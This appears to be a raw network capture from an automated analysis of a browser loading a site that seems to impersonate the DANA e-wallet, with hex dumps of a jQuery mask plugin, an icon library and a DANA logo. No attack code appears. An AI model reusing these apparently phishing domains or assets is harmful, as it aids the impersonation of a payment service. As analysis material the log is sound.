                                                                                                                            2024-10-06 11:50:07 UTC1026INData Raw: 29 2c 72 2e 64 65 66 69 6e 65 28 73 2c 41 28 75 2c 6c 2c 31 29 29 29 7d 29 29 7d 29 29 2c 79 2e 69 6e 6e 65 72 48 54 4d 4c 3d 6e 2b 22 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 68 79 64 72 61 74 65 64 7b 76 69 73 69 62 69 6c 69 74 79 3a 69 6e 68 65 72 69 74 7d 22 2c 79 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 74 79 6c 65 73 22 2c 22 22 29 2c 75 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 79 2c 66 3f 66 2e 6e 65 78 74 53 69 62 6c 69 6e 67 3a 75 2e 66 69 72 73 74 43 68 69 6c 64 29 2c 64 3d 21 31 2c 24 2e 6c 65 6e 67 74 68 3f 24 2e 6d 61 70 28 28 65 3d 3e 65 2e 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 29 29 3a 6f 2e 6a 6d 70 28 28 28 29 3d 3e 68 3d 73 65 74 54 69 6d 65 6f 75 74 28 52 2c 33 30 29 29 29 7d
                                                                                                                            Data Ascii: ),r.define(s,A(u,l,1)))}))})),y.innerHTML=n+"{visibility:hidden}.hydrated{visibility:inherit}",y.setAttribute("data-styles",""),u.insertBefore(y,f?f.nextSibling:u.firstChild),d=!1,$.length?$.map((e=>e.connectedCallback())):o.jmp((()=>h=setTimeout(R,30)))}
                                                                                                                            2024-10-06 11:50:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.64973823.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC568OUTGET /asset/jquery.mask.min.js HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                            Referer: http://penukran-poin-dana.aktsx.cfd/
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:06 UTC710INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-javascript
                                                                                                                            Etag: W/"670203dc-1ef0"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:05 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-kwz6n
                                                                                                                            X-Styx-Req-Id: 21c3e74e-83d9-11ef-bac0-1ede062cc2bf
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000053-CHI, cache-ewr-kewr1740061-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215407.921201,VS0,VE37
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            transfer-encoding: chunked
                                                                                                                            2024-10-06 11:50:06 UTC6INData Raw: 31 65 66 30 0d 0a
                                                                                                                            Data Ascii: 1ef0
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 76 61 72 20 24 6a 73 63 6f 6d 70 3d 7b 73 63 6f 70 65 3a 7b 7d 2c 66 69 6e 64 49 6e 74 65 72 6e 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 6c 2c 64 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 3d 53 74 72 69 6e 67 28 61 29 29 3b 66 6f 72 28 76 61 72 20 70 3d 61 2e 6c 65 6e 67 74 68 2c 68 3d 30 3b 68 3c 70 3b 68 2b 2b 29 7b 76 61 72 20 62 3d 61 5b 68 5d 3b 69 66 28 6c 2e 63 61 6c 6c 28 64 2c 62 2c 68 2c 61 29 29 72 65 74 75 72 6e 7b 69 3a 68 2c 76 3a 62 7d 7d 72 65 74 75 72 6e 7b 69 3a 2d 31 2c 76 3a 76 6f 69 64 20 30 7d 7d 7d 3b 24 6a 73 63 6f 6d 70 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3f 4f
                                                                                                                            Data Ascii: var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?O
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 68 29 2c 72 3d 61 2e 74 65 78 74 2e 6c 65 6e 67 74 68 3b 65 6c 73 65 20 69 66 28 66 7c 7c 22 30 22 3d 3d 3d 66 29 72 3d 66 3b 72 65 74 75 72 6e 20 72 7d 63 61 74 63 68 28 43 29 7b 7d 7d 2c 73 65 74 43 61 72 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 69 66 28 62 2e 69 73 28 22 3a 66 6f 63 75 73 22 29 29 7b 76 61 72 20 63 2c 0a 67 3d 62 2e 67 65 74 28 30 29 3b 67 2e 73 65 74 53 65 6c 65 63 74 69 6f 6e 52 61 6e 67 65 3f 67 2e 73 65 74 53 65 6c 65 63 74 69 6f 6e 52 61 6e 67 65 28 61 2c 61 29 3a 28 63 3d 67 2e 63 72 65 61 74 65 54 65 78 74 52 61 6e 67 65 28 29 2c 63 2e 63 6f 6c 6c 61 70 73 65 28 21 30 29 2c 63 2e 6d 6f 76 65 45 6e 64 28 22 63 68 61 72 61 63 74 65 72 22 2c 61 29 2c 63 2e 6d 6f 76 65 53 74 61 72 74 28 22 63 68 61 72 61 63 74 65 72
                                                                                                                            Data Ascii: h),r=a.text.length;else if(f||"0"===f)r=f;return r}catch(C){}},setCaret:function(a){try{if(b.is(":focus")){var c,g=b.get(0);g.setSelectionRange?g.setSelectionRange(a,a):(c=g.createTextRange(),c.collapse(!0),c.moveEnd("character",a),c.moveStart("character
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 29 3f 29 22 29 2c 22 28 24 31 29 3f 22 29 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 6e 2e 64 69 67 69 74 2c 22 67 22 29 2c 6e 2e 70 61 74 74 65 72 6e 29 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 52 65 67 45 78 70 28 61 29 7d 2c 64 65 73 74 72 6f 79 45 76 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 6f 66 66 28 22 69 6e 70 75 74 20 6b 65 79 64 6f 77 6e 20 6b 65 79 75 70 20 70 61 73 74 65 20 64 72 6f 70 20 62 6c 75 72 20 66 6f 63 75 73 6f 75 74 20 22 2e 73 70 6c 69 74 28 22 20 22 29 2e 6a 6f 69 6e 28 22 2e 6d 61 73 6b 20 22 29 29 7d 2c 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 62 2e 69 73 28 22 69 6e 70 75 74 22 29 3f 22 76 61 6c 22 3a 22 74 65 78 74 22 3b 69 66 28 30 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e
                                                                                                                            Data Ascii: )?)"),"($1)?").replace(new RegExp(n.digit,"g"),n.pattern));return new RegExp(a)},destroyEvents:function(){b.off("input keydown keyup paste drop blur focusout ".split(" ").join(".mask "))},val:function(a){var c=b.is("input")?"val":"text";if(0<arguments.len
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 28 75 29 77 2e 6d 61 74 63 68 28 75 2e 70 61 74 74 65 72 6e 29 3f 28 67 5b 72 5d 28 77 29 2c 75 2e 72 65 63 75 72 73 69 76 65 26 26 28 2d 31 3d 3d 3d 70 3f 70 3d 6e 3a 6e 3d 3d 3d 76 26 26 6e 21 3d 3d 70 26 26 28 6e 3d 70 2d 6b 29 2c 76 3d 3d 3d 70 26 26 28 6e 2d 3d 6b 29 29 2c 6e 2b 3d 6b 29 3a 77 3d 3d 3d 41 3f 28 74 2d 2d 2c 41 3d 76 6f 69 64 20 30 29 3a 75 2e 6f 70 74 69 6f 6e 61 6c 3f 28 6e 2b 3d 6b 2c 71 2d 3d 6b 29 3a 75 2e 66 61 6c 6c 62 61 63 6b 3f 28 67 5b 72 5d 28 75 2e 66 61 6c 6c 62 61 63 6b 29 2c 6e 2b 3d 6b 2c 71 2d 3d 6b 29 3a 63 2e 69 6e 76 61 6c 69 64 2e 70 75 73 68 28 7b 70 3a 71 2c 76 3a 77 2c 65 3a 75 2e 70 61 74 74 65 72 6e 7d 29 2c 71 2b 3d 6b 3b 65 6c 73 65 7b 69 66 28 21 61 29 67 5b 72 5d 28 78 29 3b 77 3d 3d 3d 78 3f 28 79 2e 70
                                                                                                                            Data Ascii: (u)w.match(u.pattern)?(g[r](w),u.recursive&&(-1===p?p=n:n===v&&n!==p&&(n=p-k),v===p&&(n-=k)),n+=k):w===A?(t--,A=void 0):u.optional?(n+=k,q-=k):u.fallback?(g[r](u.fallback),n+=k,q-=k):c.invalid.push({p:q,v:w,e:u.pattern}),q+=k;else{if(!a)g[r](x);w===x?(y.p
                                                                                                                            2024-10-06 11:50:06 UTC1378INData Raw: 65 6c 73 65 7b 66 2e 70 6c 61 63 65 68 6f 6c 64 65 72 26 26 62 2e 61 74 74 72 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 2c 66 2e 70 6c 61 63 65 68 6f 6c 64 65 72 29 3b 62 2e 64 61 74 61 28 22 6d 61 73 6b 22 29 26 26 0a 62 2e 61 74 74 72 28 22 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 22 6f 66 66 22 29 3b 64 3d 30 3b 66 6f 72 28 76 61 72 20 6c 3d 21 30 3b 64 3c 65 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 67 3d 6d 2e 74 72 61 6e 73 6c 61 74 69 6f 6e 5b 65 2e 63 68 61 72 41 74 28 64 29 5d 3b 69 66 28 67 26 26 67 2e 72 65 63 75 72 73 69 76 65 29 7b 6c 3d 21 31 3b 62 72 65 61 6b 7d 7d 6c 26 26 62 2e 61 74 74 72 28 22 6d 61 78 6c 65 6e 67 74 68 22 2c 65 2e 6c 65 6e 67 74 68 29 3b 63 2e 64 65 73 74 72 6f 79 45 76 65 6e 74 73 28 29 3b 63 2e 65 76 65 6e
                                                                                                                            Data Ascii: else{f.placeholder&&b.attr("placeholder",f.placeholder);b.data("mask")&&b.attr("autocomplete","off");d=0;for(var l=!0;d<e.length;d++){var g=m.translation[e.charAt(d)];if(g&&g.recursive){l=!1;break}}l&&b.attr("maxlength",e.length);c.destroyEvents();c.even
                                                                                                                            2024-10-06 11:50:06 UTC1030INData Raw: 61 29 7d 3b 61 2e 66 6e 2e 75 6e 6d 61 73 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 61 2e 6d 61 73 6b 57 61 74 63 68 65 72 73 5b 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 5d 29 3b 64 65 6c 65 74 65 20 61 2e 6d 61 73 6b 57 61 74 63 68 65 72 73 5b 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 61 28 74 68 69 73 29 2e 64 61 74 61 28 22 6d 61 73 6b 22 29 3b 62 26 26 62 2e 72 65 6d 6f 76 65 28 29 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 6d 61 73 6b 22 29 7d 29 7d 3b 61 2e 66 6e 2e 63 6c 65 61 6e 56 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 61 74 61 28 22 6d 61 73 6b 22 29 2e 67 65 74 43 6c
                                                                                                                            Data Ascii: a)};a.fn.unmask=function(){clearInterval(a.maskWatchers[this.selector]);delete a.maskWatchers[this.selector];return this.each(function(){var b=a(this).data("mask");b&&b.remove().removeData("mask")})};a.fn.cleanVal=function(){return this.data("mask").getCl
                                                                                                                            2024-10-06 11:50:06 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.649741104.17.247.2034436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC377OUTGET /ionicons@7.1.0/dist/ionicons/ionicons.esm.js HTTP/1.1
                                                                                                                            Host: unpkg.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC576INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            access-control-allow-origin: *
                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                            etag: W/"154-Yvf53JjVJOVZ9ojnyzM7GNGGCvg"
                                                                                                                            via: 1.1 fly.io
                                                                                                                            fly-request-id: 01HRWM5YEG5SEZDXEFH2F47RR2-lga
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 17857727
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ce56e95ca075e7d-EWR
                                                                                                                            2024-10-06 11:50:07 UTC347INData Raw: 31 35 34 0d 0a 69 6d 70 6f 72 74 7b 70 20 61 73 20 69 2c 62 20 61 73 20 6f 7d 66 72 6f 6d 22 2e 2f 70 2d 64 31 35 65 63 33 30 37 2e 6a 73 22 3b 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 69 6d 70 6f 72 74 2e 6d 65 74 61 2e 75 72 6c 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 22 22 21 3d 3d 6f 26 26 28 73 2e 72 65 73 6f 75 72 63 65 73 55 72 6c 3d 6e 65 77 20 55 52 4c 28 22 2e 22 2c 6f 29 2e 68 72 65 66 29 2c 69 28 73 29 7d 29 28 29 2e 74 68 65 6e 28 28 69 3d 3e 6f 28 5b 5b 22 70 2d 31 63 30 62 32 63 34 37 22 2c 5b 5b 31 2c 22 69 6f 6e 2d 69 63 6f 6e 22 2c 7b 6d 6f 64 65 3a 5b 31 30 32 35 5d 2c 63 6f 6c 6f 72 3a 5b 31 5d 2c 69 6f 73 3a 5b 31 5d 2c 6d 64 3a 5b 31 5d 2c 66 6c 69 70 52 74 6c 3a 5b 34 2c 22 66 6c 69 70 2d 72 74 6c 22 5d 2c 6e 61 6d 65 3a 5b 35 31 33 5d
                                                                                                                            Data Ascii: 154import{p as i,b as o}from"./p-d15ec307.js";(()=>{const o=import.meta.url,s={};return""!==o&&(s.resourcesUrl=new URL(".",o).href),i(s)})().then((i=>o([["p-1c0b2c47",[[1,"ion-icon",{mode:[1025],color:[1],ios:[1],md:[1],flipRtl:[4,"flip-rtl"],name:[513]
                                                                                                                            2024-10-06 11:50:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.64974323.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:06 UTC380OUTGET /asset/img/dana_logo.png HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:07 UTC667INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 12786
                                                                                                                            Content-Type: image/png
                                                                                                                            Etag: "670203dc-31f2"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:06 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-x8jfd
                                                                                                                            X-Styx-Req-Id: 21d73293-83d9-11ef-bd2c-da22e95ebabd
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:07 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000098-CHI, cache-nyc-kteb1890098-NYC
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215407.047309,VS0,VE37
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 7e 00 00 00 70 08 06 00 00 01 6e a0 2b ae 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 31 a9 49 44 41 54 78 01 ed 7d 07 98 15 35 f7 fe b2 bb b0 2c 20 bd f7 ce d2 55 ba 4a 11 41 fe a0 58 10 44 f4 93 ce 27 a0 a8 88 20 cd f2 47 11 01 0b f8 09 08 82 52 a4 88 22 45 a4 23 8a 52 94 8e d2 41 a9 d2 9b ac c0 52 96 df 7b 2e e4 92 9d 9b 99 49 e6 ce 6d bb b9 cf b3 3b 33 c9 c9 c9 c9 9b 4c 26 39 39 39 89 8a 32 f9 8d 18 31 a2 dc b9 73 e7 fe 31 89 0e 9b e0 74 46 49 6e e0 67 0c 63 cf e9 f0 63 f7 e1 72 8d 66 82 f4 ed db b7 a4 95 f0 44 67 17 cf 78 05 f3 ea 45 54 45 b8 70 aa 09 4f 0d a8 08 4f e8 fe f1 c7 1f 0b 78 94 29 3d ff e3 e3 d8 fd 8e 1d 3b 96 da d1 d8 c5 9f 3c 79 72 bf 90 86 05 22 b3 f4 ec 9e ae 2c 73 76
                                                                                                                            Data Ascii: PNGIHDR~pn+gAMAa1IDATx}5, UJAXD' GR"E#RAR{.Im;3L&99921s1tFIngccrfDgxETEpOOx)=;<yr",sv
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: df 7f bf 31 69 fd 9c fe 18 58 c6 ab 0c 3f 54 c4 26 63 3a fe 99 e7 c1 87 f3 f7 8c 26 58 15 c0 e7 cd dd a7 ec 82 28 e2 bf ff fd ef 62 0c d5 db 3e f5 d4 53 93 39 c2 a8 c2 85 0b 27 40 e8 4b 7c 98 d3 7b 2b 7d c7 47 1f 7d 54 c3 c8 17 c3 c7 93 50 2b 1f 30 86 9b 3d 33 1e 50 fc fb cc 6d 58 1a 46 c3 9e 8d 57 16 2f c3 c3 ac 12 19 0f f0 f6 0e f1 0d f9 24 5b d2 b0 56 e2 d6 75 f2 e4 c9 ed 0d 02 e8 47 19 04 ae 5e bd ea 57 1d 94 2f 5f be 80 4c 3e 9a 46 02 81 82 05 0b e6 86 fd 46 a2 55 8d c0 06 e9 4d 09 56 9a c4 4f 04 a2 b1 66 ff cc 3f f8 4d 9f 3e 7d f8 5b 6f bd 55 d2 4f 7e 3a b9 15 02 0b 17 2e 6c 65 d5 ea 59 1c 54 00 7f 5b f1 d1 71 0a 08 8c 1d 3b f6 6e 06 ac ca 15 2b 95 17 14 b2 49 d3 a4 c2 61 1a 94 50 97 33 66 cc 28 d6 d6 49 c2 65 35 d4 94 64 91 ea c9 7c c6 a6 d4 ca fd
                                                                                                                            Data Ascii: 1iX?T&c:&X(b>S9'@K|{+}G}TP+0=3PmXFW/$[VuG^W/_L>FFUMVOf?M>}[oUO~:.leYT[q;n+IaP3f(Ie5d|
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 73 4e d3 08 74 ea d4 29 67 20 1a af 5b 3c 6f ad 94 69 ed 69 9a 6e a5 01 28 3c 8c b1 bc 36 45 6e 35 d6 40 f1 81 9f 8f 9f 03 00 81 66 99 ca 11 e0 d7 b6 3c 45 2d 5d ba 74 56 b8 a2 38 1f 69 e5 c6 8b 15 05 53 29 5a 2e d2 2b 0b 91 56 79 21 92 97 5f 5b 8c ea d3 a7 4f b9 48 6c f8 84 1d 19 ea e0 05 48 86 71 92 a5 03 36 11 ce 76 66 15 56 5f ac fd fb f7 af a9 5b b7 6e 1e 11 5f b7 c2 06 0e 1c 58 06 aa fc 43 56 72 50 1c ac 77 2f cf 9c 39 f3 71 b7 f2 35 f2 f9 f8 e3 8f ef 82 31 ed 29 3b 39 e0 b5 20 f1 f3 cf 3f 6f 64 4c ef d6 33 78 37 c4 2a de 05 3b 39 20 eb 69 92 d9 2c 5f 6f cf 7f df 7d f7 e5 c0 e6 34 a1 39 86 59 62 b7 c2 01 d6 19 ec 61 9a 01 57 8a 73 71 bf 1b 0d 99 2c 21 4a 62 37 4d ab e2 c5 8b 77 c0 c1 27 5e d7 60 32 79 22 3d cd 03 2c 0d 6d 79 3e d4 f8 eb d5 ab d7 91
                                                                                                                            Data Ascii: sNt)g [<oiin(<6En5@f<E-]tV8iS)Z.+Vy!_[OHlHq6vfV_[n_XCVrPw/9q51);9 ?odL3x7*;9 i,_o}49YbaWsq,!Jb7Mw'^`2y"=,my>
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 1a 01 65 04 26 4c 98 f0 48 24 34 7a 92 11 ee f7 94 56 40 95 c1 d0 09 d2 26 02 30 cf fd 36 5c 5f 02 18 73 0d 4a 9b b5 a2 4b 1d 54 04 b0 88 d3 27 5c 5e 02 58 6c 3e 14 d4 c2 eb cc 34 02 0c 01 b8 64 26 8f eb 41 fd ad 59 b3 66 06 cb 5f 5f 35 02 61 81 c0 eb af bf 5e ff e8 d1 a3 47 dc 7e 13 a0 f3 de d6 a5 4b 97 8a 61 51 48 2d 44 aa 44 40 5a ed a4 58 fa 78 6c 04 a9 83 ad 81 0f e7 cf 9f bf 36 16 69 4a 62 0b 59 16 6c 47 f4 58 59 c2 56 e5 02 54 85 17 b0 7a bb 1b db 17 57 c1 7e fc 3b d8 18 6d 40 1e d7 14 f3 d1 e4 1a 01 c7 08 04 aa f1 7b 04 c2 62 53 1e 6c 08 49 c0 e6 83 da f7 de 7b 6f 07 2c 90 15 dc b7 6f df 36 0c 9b be ca 94 29 d3 5a 6c f4 20 8b 52 15 33 59 c7 05 d5 09 35 02 01 45 00 87 ad dd 09 1f 3a b3 d0 b1 27 a9 0c 83 b0 38 75 7e cb 96 2d e3 7b f7 ee 5d 2a a0 02
                                                                                                                            Data Ascii: e&LH$4zV@&06\_sJKT'\^Xl>4d&AYf__5a^G~KaQH-DD@ZXxl6iJbYlGXYVTzW~;m@{bSlI{o,o6)Zl R3Y5E:'8u~-{]*
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 20 4f 82 19 4b 6c b1 3d 0d d5 f8 ed 72 89 de 54 51 d8 2f bf fc f2 31 63 ba 64 c9 92 ae 28 b8 f0 34 6e b8 b8 3e 4c 43 15 d0 de c1 e8 dd b8 42 9d b6 42 24 97 31 0c 8b 5e 2a 3e f1 85 3d 3f 0e ec 30 f5 cd 4f 65 79 ed b5 d7 2a e3 90 b7 2b c6 bc d9 33 39 cd 55 2d 73 9b 36 6d f2 b1 f4 c6 2b 9d 98 d9 b3 67 cf d2 26 3c d3 03 73 d3 b3 6a 71 fe c2 8b 26 e9 84 c1 f0 bc 91 60 cc 9f 3d d3 99 04 50 67 e6 11 26 8c 8a ca 04 dc 12 19 ad f1 8a 53 2b 1b 99 a4 13 06 63 de d3 c4 c8 83 3d a3 53 4d a4 af a4 28 61 8f 1e 3d f2 90 9c 8c d6 78 85 d3 b3 92 9e 74 95 2a 55 32 05 dc 98 08 0d da db f8 0d 99 d2 62 59 40 ce a3 e2 f3 41 cf bf d2 28 93 d9 33 d2 99 f6 16 3c 4f dc 0b 1b 3f b0 95 3a 76 13 3e 8b 0e 99 c9 80 4f fd 83 86 bc 2c 1f 69 8c 6e c6 0b 09 85 15 cd 33 44 67 74 46 94 1e 65
                                                                                                                            Data Ascii: OKl=rTQ/1cd(4n>LCBB$1^*>=?0Oey*+39U-s6m+g&<sjq&`=Pg&S+c=SM(a=xt*U2bY@A(3<O?:v>O,in3DgtFe
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: da 94 47 45 e1 a2 b0 96 2d 5b 4e 14 85 ab 84 a1 a1 47 e3 05 75 b4 fb a8 63 c7 8e a4 3d 33 d5 2f ab c8 81 0f 50 12 8c bc a4 d5 a5 d8 67 21 d4 3a a9 e4 19 ce b4 a8 97 53 70 d3 42 27 77 4a fd 30 0a 48 34 23 f4 ac f0 62 d2 7b 04 43 9f ab 66 44 7c 38 26 77 c3 50 21 37 b0 b1 f9 03 34 68 a1 69 04 2a ab 04 86 2f 7d a1 8f a5 f3 79 af 61 4b dc 44 7f 1a 3e 9f bf dd 3d b4 57 7b 41 23 55 16 3b 5e 4e e2 61 c8 56 63 da b4 69 7f 3a 49 ab d3 04 17 01 4f cf 4f 59 a2 c7 78 09 db 13 47 cb 64 8f cf 49 54 fd fa f5 5f a1 3f a2 27 95 1e 6c c0 69 bb 5c 14 de 4c 19 16 01 a3 81 23 a3 67 03 c6 dc 82 31 36 8c 24 b5 6e dd ba 38 86 28 c7 2c c8 74 54 18 21 e0 b5 ed 79 f4 d1 47 c7 38 95 8b 5e 86 f4 e9 d3 87 bc e1 d3 d6 c3 81 03 07 06 4d bf cf f0 fa e9 a7 9f 46 df 71 c7 1d 19 75 c3 67 88
                                                                                                                            Data Ascii: GE-[NGuc=3/Pg!:SpB'wJ0H4#b{CfD|8&wP!74hi*/}yaKD>=W{A#U;^NaVci:IOOYxGdIT_?'li\L#g16$n8(,tT!yG8^MFqug
                                                                                                                            2024-10-06 11:50:07 UTC1378INData Raw: 00 2d b2 8a 1e be d2 9e c5 6f fc f8 f1 cd b1 78 be 2a 88 52 66 a6 83 e3 71 ec 9a cc 11 c4 52 62 c1 d7 d2 15 10 5e c2 df 75 a9 04 a9 9f 28 03 8a 98 11 de 3a 63 81 0d e1 9c 84 3f c2 c7 35 cc c1 2b 92 7e e4 f2 84 f0 88 b9 85 c7 65 3c 13 1e 69 f5 17 8f 82 c7 01 8f 68 e0 41 ef 0c e1 41 6d 24 b8 bf b5 6b d7 0e 17 8d 4a 75 58 e0 11 48 4c 4c bc fc c5 17 5f b4 08 52 8d 47 af 5c b9 32 28 27 2c c0 25 f1 05 f2 cd b4 7e fd fa 11 38 97 bd 11 ca 97 39 48 65 0c 4a 36 2f bf fc 72 f1 e5 cb 97 f7 c0 cc 6d 29 be df 4a bb d5 b1 df 23 e9 c4 89 13 3b 37 6d da 34 6a c2 84 09 f7 43 e0 88 f7 05 35 74 e8 d0 f2 68 5b fd 0f 1f 3e bc 0a 75 7f 4e e5 cd 81 96 e1 22 b5 95 0d 1b 36 0c 1d 3b 76 6c 2d e0 61 75 64 66 50 ea d7 cf 4c d2 8d 19 33 a6 26 95 07 6e 6b 36 53 f9 54 f0 20 fc 80 e3 6a
